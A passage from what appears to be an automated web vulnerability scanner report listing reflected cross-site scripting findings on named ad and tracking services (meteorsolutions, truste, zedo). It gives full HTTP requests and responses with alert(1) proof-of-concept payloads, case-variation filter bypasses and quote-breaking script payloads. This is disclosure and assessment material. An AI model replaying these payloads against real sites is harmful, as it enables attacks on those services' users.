GET /api/ie8_email?url=httpG3AG2FG2FattuverseoffersG2EcomG2FtvG5FhsiG5FbundlesG2FindexG2EphpG3FsendVarG3D20StateG5F49PromoOfferG26sourceG3DECbc0000000WIP00OG26fbidG3D9Lm6uVSxVG5FuG26mtagG3DmbarG2DemailG23&shorten=tinyurl&id=1&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%201)%3B16faf<script>alert(1)</script>25da9310260 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:41:29 GMT
Etag: "2f474720da0453874e528615d87c85b45464f2e0"
Server: nginx/0.7.65
Content-Length: 180
Connection: keep-alive

meteor.json_query_callback({"url": "http://meme.ms/cuip47", "id": "1", "persist": "http://meme.ms/persist?key=P3lDVrJa3rexwrmXrfPlFA"}, 1);16faf<script>alert(1)</script>25da9310260

4.96. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 9af12<script>alert(1)</script>c3b46f05e43 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=ee612e29-9b27-4ec8-bbf8-759478dd3755&url_fbid=9Lm6uVSxV_u&parent_fbid=&referrer=http%3A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%3FclickData%3DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%3Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%3Bwi.728%3Bhi.90%3Bai.236941493%3Bct.1%2F01&location=http%3A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B9af12<script>alert(1)</script>c3b46f05e43 HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meteor_server_d4421046-efa2-4b8f-86b0-7cdce9b8067a=d4421046-efa2-4b8f-86b0-7cdce9b8067a%3C%3EYRv1CNCXi5e%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.att.com%2F; uid=c5699614-96b6-4b6d-81ac-02170daae0a6

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Sat, 17 Sep 2011 01:42:01 GMT
Etag: "5c7333cf004a2bbfe1f6d26ba5911f5ba91d6b40"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_ee612e29-9b27-4ec8-bbf8-759478dd3755=ee612e29-9b27-4ec8-bbf8-759478dd3755%3C%3E9Lm6uVSxV_u%3C%3E%3C%3Ehttp%253A%2F%2Ftrack.pubmatic.com%2FAdServer%2FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%2FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253Dhttp%253A%2F%2Fclk.atdmt.com%2Fgo%2F335787632%2Fdirect%253Bwi.728%253Bhi.90%253Bai.236941493%253Bct.1%2F01%3C%3Ehttp%253A%2F%2Fattuverseoffers.com%2Ftv_hsi_bundles%2Findex.php%253FsendVar%253D20State_49PromoOffer%2526source%253DECbc0000000WIP00O%2526fbid%253D9Lm6uVSxV_u; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:42:01 GMT; Path=/
Set-Cookie: uid=c5699614-96b6-4b6d-81ac-02170daae0a6%00d77c2<a>11e0dd2ac6e; Domain=.meteorsolutions.com; expires=Sun, 16 Sep 2012 01:42:01 GMT; Path=/
Content-Length: 206
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "9Lm6uVSxV_u", "uid": "c5699614\\x2D96b6\\x2D4b6d\\x2D81ac\\x2D02170daae0a6\\x00d77c2\\x3Ca\\x3E11e0dd2ac6e"}, 0);9af12<script>alert(1)</script>c3b46f05e43

4.97. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 91d0b<script>alert(1)</script>b9789a4c38 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont1291d0b<script>alert(1)</script>b9789a4c38&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:33:33 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5737
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ntDivName:"te-clr1-62adc6f1-e43b-47bc-8db1-bcd5cb5ff449-itl",iconSpanId:"te-clr1-62adc6f1-e43b-47bc-8db1-bcd5cb5ff449-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02cont1291d0b<script>alert(1)</script>b9789a4c38",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_62adc6f1_e43b_47bc_8db1_bcd5cb5ff449_ib,interstitialWidth:728,interstitialHei
...[SNIP]...

4.98. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:33:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5821
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a href="http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl728x90fed22<ScRiPt>alert(1)</ScRiPt>002ba52e113&w=728&h=90" target="_blank">
...[SNIP]...

4.99. http://choices.truste.com/ca [iplc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload b2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tr&iplc=ctrb2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:36:28 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5739
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
cdd_eaa0_4b10_9820_b0aa6f5cb790_bi={baseName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790",anchName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-anch",width:728,height:90,ox:0,oy:0,plc:"tr",iplc:"ctrb2beb<ScRiPt>alert(1)</ScRiPt>9888b1420ce",intDivName:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-itl",iconSpanId:"te-clr1-6739ccdd-eaa0-4b10-9820-b0aa6f5cb790-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att02con
...[SNIP]...

4.100. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload a6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002&plc=tra6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5737
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
_clr1_651da5c8_906d_4ecd_9ea4_8e2426759de9_bi={baseName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9",anchName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-anch",width:728,height:90,ox:0,oy:0,plc:"tra6613<ScRiPt>alert(1)</ScRiPt>b83e4cf829",iplc:"ctr",intDivName:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-itl",iconSpanId:"te-clr1-651da5c8-906d-4ecd-9ea4-8e2426759de9-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerI
...[SNIP]...

4.101. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att02&cid=0511wl728x90&c=att02cont12&w=728&h=90&zi=10002291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/335787632/direct;wi.728;hi.90/01?click=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdzTEOgDAIheGrGGabUCjt002rnsa4ORnvLrj9X8ILD6nSPMgEreNAKo4mhlxc2UFdodi3nFhqSeWYJK0rI4F5YaAffdsppnHcTLiF5FeUeVVTeBbP6z5Pzxp_WCy_H4MVGc4-%26redirectURL%3Dhttp%253A%252F%252Ftrack.pubmatic.com%252FAdServer%252FAdDisplayTrackerServlet%253FclickData%253DwmoAAMNqAAA%252FWgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAABwAAAAAAAAAAAAAAAgAAADU1Nzg1MzA3LUE1REMtNEUzQS1CNDUyLUREQkQ0MjZEM0ExRAAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAA_url%253D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:35:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5739
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
om/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",icon_cam_mo:"http://choices.truste.com/assets/ad_choices_en.png",iconText:"",aid:"att02",pid:"mec01",zindex:"10002291e4<ScRiPt>alert(1)</ScRiPt>643b283f84c",cam:"2",cid:"0511wl728x90",optoutLink:"http://preferences.truste.com/preference.html?affiliateId=16&pid=mec01&aid=att02&cid=0511wl728x90&w=728&h=90",target:"over"};
truste.ca.bindingInitMap[te_clr1_8
...[SNIP]...

4.102. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57523'%3balert(1)//761ebfa4333 was submitted in the $ parameter. This input was echoed as 57523';alert(1)//761ebfa4333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x9057523'%3balert(1)//761ebfa4333&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=91:90:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2676
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=collective728x9057523';alert(1)//761ebfa4333,collective728x90ddc3c';z="+Math.random();}

if(zzuid=='
...[SNIP]...

4.103. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cd0e"-alert(1)-"31d922bac00 was submitted in the $ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=collective728x902cd0e"-alert(1)-"31d922bac00&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
